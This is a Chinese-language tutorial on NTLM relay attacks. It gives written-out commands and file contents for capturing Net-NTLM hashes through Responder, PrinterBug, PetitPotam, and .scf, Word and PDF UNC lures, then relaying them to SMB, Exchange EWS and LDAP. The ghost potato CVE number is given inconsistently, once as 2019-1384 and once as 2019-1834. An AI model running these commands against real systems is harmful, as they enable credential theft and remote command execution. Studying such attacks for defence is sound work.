发生在ntlm认证的第三步,在response消息中存在net-ntlm hash ,当攻击者获取net-ntlmhash后,可以重放ntlm hash进行中间人攻击
客户端 攻击者 服务端
negotiate -> | -> negotiate
challenge <- | <- challenge (general challenge)
authenticate -> | -> authenticate (check response)
ntlm relay攻击分为两步 1.获取net-ntlm hash 2.重放net-ntlm hash
捕获ntlmhash
概念理解
LLMNR和NBNS协议
LLMNR link-local multicast name resolution 链路本地多播名称解析, NBNS network basic input output system name service 网络基本输入输出系统名称服务 用于局域网中的名称解析。
windows的解析顺序为
1.本地host文件
2.DNS缓存、DNS服务器
3.LLMNR 、NBNS
LLMNR协议解析
基于域名系统的数据包格式协议,将局域网内的所有ipv4和ipv6地址全部解析到同一本地链路的主机上,称为多播dns 监听端口为udp5355
NBNS协议解析
用于具有20-200的局域网内。通过udp的137端口,是一种应用程序接口,系统可以利用wins服务、广播以及lmhosts文件等多种模式将netbios名解析为相应IP地址
tips:lmhosts文件是Windows操作系统中的一个本地主机名解析文件,它可以用于将IP地址映射到主机名,以便在本地网络上进行名称解析。它通常用于解决网络上的名称解析问题,例如在没有DNS服务器的情况下,或者在DNS服务器无法解析某些主机名时使用。lmhosts文件通常位于Windows系统目录下的system32\drivers\etc目录中,可以使用文本编辑器进行编辑。在lmhosts文件中,每行包含一个IP地址和一个主机名,它们之间用空格或制表符分隔。此外,lmhosts文件还支持一些特殊的标记和注释,以便更好地管理和维护文件内容。
NBNS协议进行名称解析的过程
1.检查本地的NETBIOS缓存
2.没有缓存去找已经配置好的win服务器
3.向子网域发送广播
4.读取本地的lmhosts文件
攻击
1.利用responder监听网卡
./responder.py -i 10.211.55.2 -wrfv
2.是目标主机主动向攻击者发送NTLM认证
方法1:输入一个不存在的名称,本地hosts文件和DNS服务器均不能正常解析该名称,于是系统会发送LLMNR/NBNS数据包请求解析。攻击者收到后告诉客户端自己是该不存在的名称并要求客户端发送net-ntlmhash认证,以此收到net-ntlm hash
在域内主机10.211.55.7请求解析不存在的名称abcde,此时responder对目标主机进行LLMNR/NBNS毒化,要求其输入凭证获取net-ntlmhash
方法2:通过打印机漏洞 -printerbug.py
windows的MS-RPRN协议打印客户端和服务器之间的通信。该协议定义的方法毁掉用一个远程更改通知对象,该对象对打印机的更改进行监视,并将更改通知发送给打印客户端。
任何经过身份验证的与成员都可以连接到远程服务器的打印服务spoolsv.exe,并请求对一个新的打印作业进行更新,令其将该通知发送给制定目标,之后他会将立即测试连接,制定目标进行身份验证。
打印机是有system权限运行的,可以访问打印机的MS-RPRNRPC接口,迫使打印机服务向制定机器发起请求,就能取得目标机器的net-ntlm hash
工具Printerbug.py
该脚本会触发spoolservice bug 强制目标主机10.211.55.4通过MS-RPRNRPC接口对攻击者10.211.55.2进行NTLM身份验证。
python ptrinterbug.py xie/hack:p@ss1234@10.211.55.4 10.211.55.2
利用responder接受目标机器发送的SMB net-ntlm hash
方法3:文件系统远程协议 --petitpotam
利用微软加密文件系统远程协议MS-EFSRPC,用于对远程存储盒通过网络访问的加密数据执行维护和管理操作。利用petitpotam可以连接到LSARPC强制触发目标机器向制定远程服务器发送net-ntlm hash
工具petitpotam.py脚本 强制10.211.55.4向10.211.55.2发起ntlm身份认证。
python3 petitpotam.py -d xie.com -u hack -p p@ss1234 10.211.55.2 10.211.55.4
使用petitpotam.py脚本触发目标机器向攻击者发起SMB认证
方法4:ntlm_theft 盗窃
.scf后缀文件
一个文件夹内含有.scf文件,由于scf文件含有iconfile属性,因此explore.exe会尝试获取文件夹的图标。Iconfile属性支持UNC路径。所以当打开文件夹的时候,目标机器就会请求指定UNC的图标资源,并将当前用户的NTLM V2 Hash发送给指定机器,部署该机器一个responder监听就可以接收相关的Net-ntlm hash
创建一个test文件夹,并在文件夹下创建test.scf文件
[shell]
command=2
IconFile=\\10.211.55.2\test\test.ico
[Taskbar]
Command=ToggleDesktop
只要访问了该文件夹,目标机器就会请求指定的UNC路径
方法5:利用windows系统命令达成UNC访问
命令
cacls \\ip\\test
attrib \\ip\\xx
方法6:利用word
里面放一张图片,通过压缩软件打开,进入到test.docx\word\_rels文件,可以注意到其中而target="media/image1.jpeg"/
修改target参数为指定的UNC路径,再加上TargetMode="External" 只要有人访问了相关的word文档,目标主机就回去请求指定的UNC图片资源
方法7:利用PDF
pdf文件可以添加请求远程SMB服务器文件的功能,利用可盗窃windows的net-ntlm hash。前提受限于adobe pdf才能收到 局限性比较大
python2 worsePDF.py test.pdf 10.211.55.2
重放net-ntlm hash
获取目标机器的net-ntlm hash之后 1.hashcat破解net-ntlm hash 2.中继net-ntlm hash
中继NTLMhash -- 中级道SMB服务,控制该服务器执行任意命令
一.工作组
机器没有互相信任关系。微软在MS08-068对中继到自身的机器做了限制但是补丁在CVE-2019-1384被攻击者绕过
1.当收到用户的SMB请求之后,最直接的就是把请求中继会本身,从而控制机器。微软在补丁中通过修改SMB身份验证答复的验证方式防止姘居重播。
type1阶段,A访问B
type2 A收到B的challenge值,缓存在lsass进程中
type3 B收到A的认证消息后,查询lsass进程有没有缓存,如果有则认证失败。
如果AB是不同主机,namelsass进程中就没有缓存。如果是同一台主机就会认证失败
2.CVE-2019-1834 ghost potato。在微软的补丁中,缓存是存在300s时效性的。该Poc在休眠315s后,发送type3认证消息,绕过补丁 从而实现在目标机器的启动目录上上传指定文件
python ntlmrelayx.py -t smb://10.11.55.7 -smb2support --gpotato-startup test.txt
攻击成功后,会在启动目录下生成一个test.txt文件
二.域环境
普通域用户默认可以登录其他所有的机器(除域控),可以将域用户的net-ntlm hash中继到域内的其他机器
1.impacket下的smbrelayx.py。 该脚本接受域用户的net-ntlm hash,中级道域内其他机器执行指定命令
python3 smbrelayx.py -h 10.211.55.16 -c whoami
接收来自10.211.55.5的流量,中继到10.211.55.16的机器,执行whoami命令
2.impacket的ntlmrelayx.py
该脚本接受域用户的net-ntlm hash,中继到域内其他机器执行指定命令
python3 ntlmrelayx.py -t smb://10.211.55.16 -c whoami -smb2support
接收来自10.211.55.5的流量,中继到10.211.55.16的机器,执行whoami命令
3.responder下的multirelay.py
all参数获得一个稳定的shell。 -t用于指定中继的机器。
通过Multirelay.py脚本执行如下命令
./multirelay.py -t 10.211.55.16 -u all
中继到http
很多http也支持ntlm恩正,中继到http,http默认策略是不签名的
1)exchange认证。支持ntlmssp 可以将smb流量中继到exchange的ews接口中,从而进行收发邮件等操作
使用ntlmrelayToEWS.py脚本执行如下命令进行监听
python2 ntlmRelayToEWS.py -t https://10.211.55.5/EWS/exchange.asmx -r getFlolder -f inbox -v
收到目标用户的ntlmhash 后成功可以导出邮件
中继到ldap协议
域内默认使用ldap协议,也支持ntlm认证。是常用的一种攻击方式
ldap的默认策略是协商前民,并不是强制签名,是否签名由客户端决定,服务端和客户端协商是否需要签名。
http和smb协议中继到ldap的不同之处在于
1.http中继到ldap不要求进行签名可以直接进行中继
最新的中继手法就是想办法将http类型的流量中继到ldap上
2.smb协议中继到ldap需要签名 只能绕过 2019-1040 绕过ntlm消息完整性校验
ntlm relay防御
预控上的ldap强制开启签名,那么攻击者将无法将其他流量中继到ldap进行高危险操作